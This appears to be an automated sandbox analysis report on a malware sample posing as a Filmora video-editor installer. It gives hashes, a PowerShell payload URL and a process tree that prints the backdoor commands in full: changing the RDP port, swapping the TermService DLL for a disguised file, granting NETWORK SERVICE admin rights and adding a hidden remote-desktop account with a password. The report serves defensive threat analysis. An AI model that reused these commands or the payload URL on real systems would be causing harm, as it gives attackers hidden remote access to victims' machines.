Analysis
-
max time kernel
128s -
max time network
136s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
21-07-2021 08:36
Static task
static1
Behavioral task
behavioral1
Sample
Filmora-Wondershare-Installer.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Filmora-Wondershare-Installer.exe
Resource
win10v20210410
General
-
Target
Filmora-Wondershare-Installer.exe
-
Size
9.2MB
-
MD5
5e12e56a643c71b913ea60f48f28726d
-
SHA1
8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
-
SHA256
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
-
SHA512
807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 18 4292 powershell.exe 20 4292 powershell.exe 21 4292 powershell.exe 22 4292 powershell.exe 24 4292 powershell.exe 26 4292 powershell.exe 28 4292 powershell.exe 30 4292 powershell.exe 32 4292 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
ViJoy.exeexe2.exeexe1.exeNFWCHK.exepid process 2488 ViJoy.exe 3268 exe2.exe 3304 exe1.exe 1684 NFWCHK.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Filmora-Wondershare-Installer.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Filmora-Wondershare-Installer.exe -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1816 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 4692 4692 -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
exe2.exedescription ioc process File opened for modification \??\PhysicalDrive0 exe2.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6EAF.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kb1ue3tv.ivt.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_uvddbqio.rzs.psm1 powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6EFF.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6ECF.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6E8E.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6F0F.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Modifies registry class 1 IoCs
Processes:
Filmora-Wondershare-Installer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Filmora-Wondershare-Installer.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1816 powershell.exe 1816 powershell.exe 1816 powershell.exe 3844 powershell.exe 3844 powershell.exe 3844 powershell.exe 1988 powershell.exe 1988 powershell.exe 1988 powershell.exe 1784 powershell.exe 1784 powershell.exe 1784 powershell.exe 1816 powershell.exe 1816 powershell.exe 1816 powershell.exe 4292 powershell.exe 4292 powershell.exe 4292 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 620 620 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1816 powershell.exe Token: SeDebugPrivilege 3844 powershell.exe Token: SeIncreaseQuotaPrivilege 3844 powershell.exe Token: SeSecurityPrivilege 3844 powershell.exe Token: SeTakeOwnershipPrivilege 3844 powershell.exe Token: SeLoadDriverPrivilege 3844 powershell.exe Token: SeSystemProfilePrivilege 3844 powershell.exe Token: SeSystemtimePrivilege 3844 powershell.exe Token: SeProfSingleProcessPrivilege 3844 powershell.exe Token: SeIncBasePriorityPrivilege 3844 powershell.exe Token: SeCreatePagefilePrivilege 3844 powershell.exe Token: SeBackupPrivilege 3844 powershell.exe Token: SeRestorePrivilege 3844 powershell.exe Token: SeShutdownPrivilege 3844 powershell.exe Token: SeDebugPrivilege 3844 powershell.exe Token: SeSystemEnvironmentPrivilege 3844 powershell.exe Token: SeRemoteShutdownPrivilege 3844 powershell.exe Token: SeUndockPrivilege 3844 powershell.exe Token: SeManageVolumePrivilege 3844 powershell.exe Token: 33 3844 powershell.exe Token: 34 3844 powershell.exe Token: 35 3844 powershell.exe Token: 36 3844 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeIncreaseQuotaPrivilege 1988 powershell.exe Token: SeSecurityPrivilege 1988 powershell.exe Token: SeTakeOwnershipPrivilege 1988 powershell.exe Token: SeLoadDriverPrivilege 1988 powershell.exe Token: SeSystemProfilePrivilege 1988 powershell.exe Token: SeSystemtimePrivilege 1988 powershell.exe Token: SeProfSingleProcessPrivilege 1988 powershell.exe Token: SeIncBasePriorityPrivilege 1988 powershell.exe Token: SeCreatePagefilePrivilege 1988 powershell.exe Token: SeBackupPrivilege 1988 powershell.exe Token: SeRestorePrivilege 1988 powershell.exe Token: SeShutdownPrivilege 1988 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeSystemEnvironmentPrivilege 1988 powershell.exe Token: SeRemoteShutdownPrivilege 1988 powershell.exe Token: SeUndockPrivilege 1988 powershell.exe Token: SeManageVolumePrivilege 1988 powershell.exe Token: 33 1988 powershell.exe Token: 34 1988 powershell.exe Token: 35 1988 powershell.exe Token: 36 1988 powershell.exe Token: SeDebugPrivilege 1784 powershell.exe Token: SeIncreaseQuotaPrivilege 1784 powershell.exe Token: SeSecurityPrivilege 1784 powershell.exe Token: SeTakeOwnershipPrivilege 1784 powershell.exe Token: SeLoadDriverPrivilege 1784 powershell.exe Token: SeSystemProfilePrivilege 1784 powershell.exe Token: SeSystemtimePrivilege 1784 powershell.exe Token: SeProfSingleProcessPrivilege 1784 powershell.exe Token: SeIncBasePriorityPrivilege 1784 powershell.exe Token: SeCreatePagefilePrivilege 1784 powershell.exe Token: SeBackupPrivilege 1784 powershell.exe Token: SeRestorePrivilege 1784 powershell.exe Token: SeShutdownPrivilege 1784 powershell.exe Token: SeDebugPrivilege 1784 powershell.exe Token: SeSystemEnvironmentPrivilege 1784 powershell.exe Token: SeRemoteShutdownPrivilege 1784 powershell.exe Token: SeUndockPrivilege 1784 powershell.exe Token: SeManageVolumePrivilege 1784 powershell.exe Token: 33 1784 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
exe2.exepid process 3268 exe2.exe 3268 exe2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Filmora-Wondershare-Installer.exeViJoy.exeexe2.exeexe1.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 680 wrote to memory of 2488 680 Filmora-Wondershare-Installer.exe ViJoy.exe PID 680 wrote to memory of 2488 680 Filmora-Wondershare-Installer.exe ViJoy.exe PID 680 wrote to memory of 2488 680 Filmora-Wondershare-Installer.exe ViJoy.exe PID 2488 wrote to memory of 3304 2488 ViJoy.exe exe1.exe PID 2488 wrote to memory of 3304 2488 ViJoy.exe exe1.exe PID 2488 wrote to memory of 3268 2488 ViJoy.exe exe2.exe PID 2488 wrote to memory of 3268 2488 ViJoy.exe exe2.exe PID 2488 wrote to memory of 3268 2488 ViJoy.exe exe2.exe PID 3268 wrote to memory of 1684 3268 exe2.exe NFWCHK.exe PID 3268 wrote to memory of 1684 3268 exe2.exe NFWCHK.exe PID 3304 wrote to memory of 1816 3304 exe1.exe powershell.exe PID 3304 wrote to memory of 1816 3304 exe1.exe powershell.exe PID 1816 wrote to memory of 3860 1816 powershell.exe csc.exe PID 1816 wrote to memory of 3860 1816 powershell.exe csc.exe PID 3860 wrote to memory of 1776 3860 csc.exe cvtres.exe PID 3860 wrote to memory of 1776 3860 csc.exe cvtres.exe PID 1816 wrote to memory of 3844 1816 powershell.exe powershell.exe PID 1816 wrote to memory of 3844 1816 powershell.exe powershell.exe PID 1816 wrote to memory of 1988 1816 powershell.exe powershell.exe PID 1816 wrote to memory of 1988 1816 powershell.exe powershell.exe PID 1816 wrote to memory of 1784 1816 powershell.exe powershell.exe PID 1816 wrote to memory of 1784 1816 powershell.exe powershell.exe PID 1816 wrote to memory of 4272 1816 powershell.exe reg.exe PID 1816 wrote to memory of 4272 1816 powershell.exe reg.exe PID 1816 wrote to memory of 4292 1816 powershell.exe reg.exe PID 1816 wrote to memory of 4292 1816 powershell.exe reg.exe PID 1816 wrote to memory of 4312 1816 powershell.exe reg.exe PID 1816 wrote to memory of 4312 1816 powershell.exe reg.exe PID 1816 wrote to memory of 4496 1816 powershell.exe net.exe PID 1816 wrote to memory of 4496 1816 powershell.exe net.exe PID 4496 wrote to memory of 4516 4496 net.exe net1.exe PID 4496 wrote to memory of 4516 4496 net.exe net1.exe PID 1816 wrote to memory of 4548 1816 powershell.exe cmd.exe PID 1816 wrote to memory of 4548 1816 powershell.exe cmd.exe PID 4548 wrote to memory of 4564 4548 cmd.exe cmd.exe PID 4548 wrote to memory of 4564 4548 cmd.exe cmd.exe PID 4564 wrote to memory of 4580 4564 cmd.exe net.exe PID 4564 wrote to memory of 4580 4564 cmd.exe net.exe PID 4580 wrote to memory of 4600 4580 net.exe net1.exe PID 4580 wrote to memory of 4600 4580 net.exe net1.exe PID 1816 wrote to memory of 4620 1816 powershell.exe cmd.exe PID 1816 wrote to memory of 4620 1816 powershell.exe cmd.exe PID 4620 wrote to memory of 4636 4620 cmd.exe cmd.exe PID 4620 wrote to memory of 4636 4620 cmd.exe cmd.exe PID 4636 wrote to memory of 4652 4636 cmd.exe net.exe PID 4636 wrote to memory of 4652 4636 cmd.exe net.exe PID 4652 wrote to memory of 4672 4652 net.exe net1.exe PID 4652 wrote to memory of 4672 4652 net.exe net1.exe PID 4740 wrote to memory of 4780 4740 cmd.exe net.exe PID 4740 wrote to memory of 4780 4740 cmd.exe net.exe PID 4780 wrote to memory of 4800 4780 net.exe net1.exe PID 4780 wrote to memory of 4800 4780 net.exe net1.exe PID 4820 wrote to memory of 4860 4820 cmd.exe net.exe PID 4820 wrote to memory of 4860 4820 cmd.exe net.exe PID 4860 wrote to memory of 4880 4860 net.exe net1.exe PID 4860 wrote to memory of 4880 4860 net.exe net1.exe PID 4900 wrote to memory of 4940 4900 cmd.exe net.exe PID 4900 wrote to memory of 4940 4900 cmd.exe net.exe PID 4940 wrote to memory of 4960 4940 net.exe net1.exe PID 4940 wrote to memory of 4960 4940 net.exe net1.exe PID 4980 wrote to memory of 5020 4980 cmd.exe net.exe PID 4980 wrote to memory of 5020 4980 cmd.exe net.exe PID 5020 wrote to memory of 5040 5020 net.exe net1.exe PID 5020 wrote to memory of 5040 5020 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeC:\Users\Public\Documents\Wondershare\NFWCHK.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'4⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ca1csawe\ca1csawe.cmdline"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES385B.tmp" "c:\Users\Admin\AppData\Local\Temp\ca1csawe\CSCCA8CC198C1144714B612E13F5E396C81.TMP"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f5⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 9aDQknBl /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 9aDQknBl /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 9aDQknBl /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
